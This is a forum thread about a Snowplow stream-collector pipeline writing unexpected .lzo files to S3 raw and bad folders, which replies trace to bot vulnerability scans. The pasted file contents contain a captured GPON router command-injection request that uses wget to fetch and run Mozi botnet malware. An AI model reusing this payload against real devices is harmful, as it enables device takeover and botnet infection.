I am setting up a real time set up. While starting the collector and enrich respective services or after certain duration , i noticed there are certain dummy files are getting written in S3 bucket RAW and BAD folder.
S3://bucket-name/raw
S3://bucket-name/bad
Below are the versions of application i am using:
Collector : snowplow-stream-collector-kinesis-1.0.0.jar
Stream Enrich : snowplow-stream-enrich-kinesis-1.0.0.jar
Elastic Search Loader (Good and Bad) : snowplow-elasticsearch-loader-http-0.10.2.jar
S3 Sink (Good and Bad) : snowplow-s3-loader-0.6.0.jar
Let me know if need to share config.hocon respective file details.
Hi @sp_user, what do these dummy files look like? Can you give us examples of their filenames and extensions and whether there is anything in them? Are they written to the root of the bucket or to separate folders?
What about the good bucket? Are there any of dummy files in there too?
These dummy files are .lzo files getting created in initial bucket/raw for good and bucket/bad for bad events. In both case files are getting created at same time in respective bucket.
Below are .lzo file file details for bucket/raw :
‰LZO
€ @ ¤_ò5 /AØ Õ ³ ³)ØÕXÍL)²¼W™!q½ÿÁ byte´ d 222.244.194.113
È sŒúá Ò UTF-8 Ü ssc-1.0.0-kinesis, Hello, World@ /GponForm/diag_FormJ aimages/T vXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m±O±>/tmp/gpon80;sh+^
eTimeout-Access: Host: 127.0.0.1 Accept: / Accept-Encoding: gzip, deflate user-agent: Hello, World X-Forwarded-For: 222.244.19„2
X-Forwarded-Port: 80 +\ roto: http Conne˜ : keep-alive application/octet-streamh ;x 127.€! :š $9dec2c39-e03e-44c1-8a45-90f22a159e5ezi Aiglu:com.snowplowanalytics’D
/CollectorPayload/thrift/1-0-0
Note: Currently no events are flowing to collector via tracker. Also similarly if I fire some dummy event using curl command , files are getting generated in respective bucket as same time.
curl -i "http://localhost:8080/i?"
Both of these look like legitimate failed events (adapter failures) from something sending data to the collector.
I’d recommend using the Javascript tracker to test the endpoint, but if you use curl you’ll need some of the required parameters to the event doesn’t fail validation.
Thanks Mike . Will use with mentioned curl command for further manual testing.
But can you please help me with initial question , why there are some event getting triggered automatically and .lzo files are getting generated under the respective folder in S3 bucket as there is no event being pushed to collector neither by tracker nor by curl command.
I’m guessing that your collector is publicly available on the internet?
If so your collector will be getting scanned by various bots / spiders that perform automated vulnerability scans. Adapter failures logs anything that does not conform to an expected Snowplow collector path, so in this case it’s logging traffic from a scanner that was trying to exploit the collector (in this case it’s a known CVE for a home router).
There’s not really a huge amount you can do about this other than ignore certain adapter failures or alternately you can attempt to block certain traffic to your collector.